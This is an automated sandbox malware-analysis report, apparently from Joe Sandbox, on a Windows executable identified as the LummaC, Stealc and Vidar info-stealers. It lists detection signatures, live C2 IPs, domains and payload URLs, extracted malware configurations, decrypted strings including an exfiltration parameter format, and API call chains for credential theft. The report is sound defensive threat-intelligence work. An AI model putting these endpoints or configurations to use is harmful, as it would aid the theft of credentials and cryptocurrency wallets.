Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1500787
MD5:	8e41d2107579afb2911dccffeab97f1c
SHA1:	e364f0f9b85adcb64747c8eac819a1b59b458727
SHA256:	c5c219a6512dc639b5ac5837abe4217e265f7d165159da131eb32048b0c15030
Tags:	exe
Infos:

Detection

LummaC, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://46.8.231.109/c4754d4f680ead72.php	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpb	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/nss3.dll	Avira URL Cloud: Label: malware
Source: https://t.me/iyigunl	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpnu	Avira URL Cloud: Label: malware
Source: https://condedqpwqm.shop/api.	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll#	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll_	Avira URL Cloud: Label: malware
Source: https://condedqpwqm.shop/api45	Avira URL Cloud: Label: phishing
Source: https://steamcommunity.com/profiles/76561199761128941	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dlli	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://condedqpwqm.shop/apitK	Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpC	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpry=----IDHIIJJJKEGIDGCBAFIJdefaultrelease	Avira URL Cloud: Label: malware
Source: https://t.me/jamelwt#cp	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exe	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll	Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop	Avira URL Cloud: Label: phishing
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dlls	Avira URL Cloud: Label: malware
Source: http://46.8.231.109	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.php:#	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/c4754d4f680ead72.phpw	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll-	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/freebl3.dll	Avira URL Cloud: Label: malware
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll(	Avira URL Cloud: Label: malware
Source: condedqpwqm.shop	Avira URL Cloud: Label: phishing
Source: https://condedqpwqm.shop/T	Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/sql.dll	Avira URL Cloud: Label: malware
Source: http://147.45.68.138/softokn3.dll	Avira URL Cloud: Label: malware
Source: stamppreewntnq.shop	Avira URL Cloud: Label: phishing
Source: stagedchheiqwo.shop	Avira URL Cloud: Label: phishing
Source: http://147.45.68.138/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/	Avira URL Cloud: Label: malware
Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941", "https://t.me/jamelwt"], "Botnet": "d9949d63cb2f6fce6f80667c0c98ea24"}
Source: 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php"}
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["locatedblsoqp.shop", "caffegclasiqwp.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "stamppreewntnq.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\HDAFIIDAKJ.exe	ReversingLabs: Detection: 32%
Source: C:\Users\userIEHDAFHDHC.exe	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe	ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\HDAFIIDAKJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf75d3791d7_vrewqgq[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\66cf818156193_ldjfnsfd[1].exe	Joe Sandbox ML: detected
Source: C:\Users\userFBKFCFBFID.exe	Joe Sandbox ML: detected
Source: C:\Users\userIEHDAFHDHC.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\DHCGHDHIDH.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: caffegclasiqwp.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stamppreewntnq.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stagedchheiqwo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: millyscroqwp.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: evoliutwoqm.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: condedqpwqm.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: traineiwnqo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: locatedblsoqp.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: condedqpwqm.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	3_2_00409BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00418940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	3_2_0040C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	3_2_00407280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00409B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB56C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6CB56C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CCAA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6CCAA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00406AB6 CryptUnprotectData,LocalAlloc,LocalFree,	29_2_00406AB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040F8D5 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	29_2_0040F8D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00406A53 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	29_2_00406A53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004083FA memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,	29_2_004083FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9C6C80 CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,CertFindCertificateInStore,CertGetNameStringW,CertGetNameStringW,CertFreeCRLContext,CryptMsgClose,CertCloseStore,CryptQueryObject,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetLastError,CryptBinaryToStringW,GetLastError,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	29_2_6C9C6C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49740 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source:	Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb0, source: file.exe
Source:	Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1963284287.000000003C6D1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.29.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: c:\sl1g47f51c90hn\obj\Re\ease\fsB.pdb0 source: 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, DHCGHDHIDH.exe.29.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000001D.00000002.1955580137.00000000307F1000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1976265384.000000006CA35000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2215879261.000000002232B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr
Source:	Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb0 source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source:	Binary string: c:\6yuam8\obj\Re\ease\fsB.pdb source: HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, userIEHDAFHDHC.exe.3.dr
Source:	Binary string: c:\par8k7z\obj\Re\ease\fsB.pdb source: file.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	3_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	29_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	29_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	29_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	29_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	29_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	29_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	29_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	29_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	29_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	29_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	29_2_00413EA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 29_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

29_2_0041391C

